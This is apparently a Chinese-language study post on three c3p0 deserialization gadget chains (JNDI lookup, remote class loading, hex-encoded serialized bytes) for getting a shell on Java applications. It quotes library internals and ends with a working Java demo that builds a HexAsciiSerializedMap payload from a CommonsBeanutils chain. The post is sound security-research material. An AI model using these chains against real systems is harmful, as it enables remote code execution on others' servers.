c3p0的三个gadget的学习
目前c3p0有三种方式getshell
前两个可以放在一起学习,在com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject,可以看到,如果是IndirectlySerialized的实例就会去调用getObject方法
1 2 3
| if (o instanceof IndirectlySerialized) { o = ((IndirectlySerialized)o).getObject(); }
|
而它的实现类只有一个com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized,我们可以看看
触发jndi
很明显如果contextName不为空,则会触发,这里没必要继续说下去了
加载远程类
接下来是第二个,这也是ysoserial本身集成的一个payload,继续往下看,ReferenceableUtils.referenceToObject,也是很明显通过URLClassloader加载远程类,并且默认初始化了,因此可以直接在静态块里面放入恶意数据
关于writeObject的话,以ysoserial的为例,PoolSource implements ConnectionPoolDataSource, Referenceable,只要不实现序列化接口,并实现getReference方法返回我们的Reference对象即可,也是很简单的
hex序列化字节加载器
这个更多会用到在fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等里面配合使用
当在userOverridesAsString当中设置了序列化数据后,当调用set方法setUpPropertyListeners时就能触发,而这个监听器正好在设置完userOverridesAsString就会调用
可以看到里面对序列化数据的处理
1 2 3 4 5 6 7 8 9
| public static Map parseUserOverridesAsString(String userOverridesAsString) throws IOException, ClassNotFoundException { if (userOverridesAsString != null) { String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1); byte[] serBytes = ByteUtils.fromHexAscii(hexAscii); return Collections.unmodifiableMap((Map)SerializableUtils.fromByteArray(serBytes)); } else { return Collections.EMPTY_MAP; } }
|
最后触发原生反序列化
后面才发现又个地方比较坑,在com.mchange.v2.c3p0.impl.C3P0ImplUtils#parseUserOverridesAsString
1
| String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1);
|
这里会把最后一位吃了有点恶心,因此构造payload的时候要像这样
1
| String payload = "HexAsciiSerializedMap:"+HexString+":";
|
这里给个demo方便测试
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52
| import com.govuln.deserialization.CB1; import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource; import hudson.remoting.Base64; import javassist.ClassPool; import javassist.CtClass; import org.python.antlr.ast.Str;
import java.io.*; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.lang.reflect.Modifier; import java.util.HashSet; import java.util.LinkedList; import java.util.PriorityQueue;
public class Test {
public static byte[] toByteArray(InputStream in) throws IOException { byte[] classBytes; classBytes = new byte[in.available()]; in.read(classBytes); in.close(); return classBytes; }
public static String bytesToHexString(byte[] bArray, int length) { StringBuffer sb = new StringBuffer(length);
for(int i = 0; i < length; ++i) { String sTemp = Integer.toHexString(255 & bArray[i]); if (sTemp.length() < 2) { sb.append(0); }
sb.append(sTemp.toUpperCase()); } return sb.toString(); }
public static void main(String[] args) throws Exception {
byte[] data = CB1.getPayload(); String HexString = bytesToHexString(data, data.length); System.out.println(HexString.length()); String payload = "HexAsciiSerializedMap:"+HexString+":"; WrapperConnectionPoolDataSource wrapperConnectionPoolDataSource = new WrapperConnectionPoolDataSource(); wrapperConnectionPoolDataSource.setUserOverridesAsString(payload);
}
}
|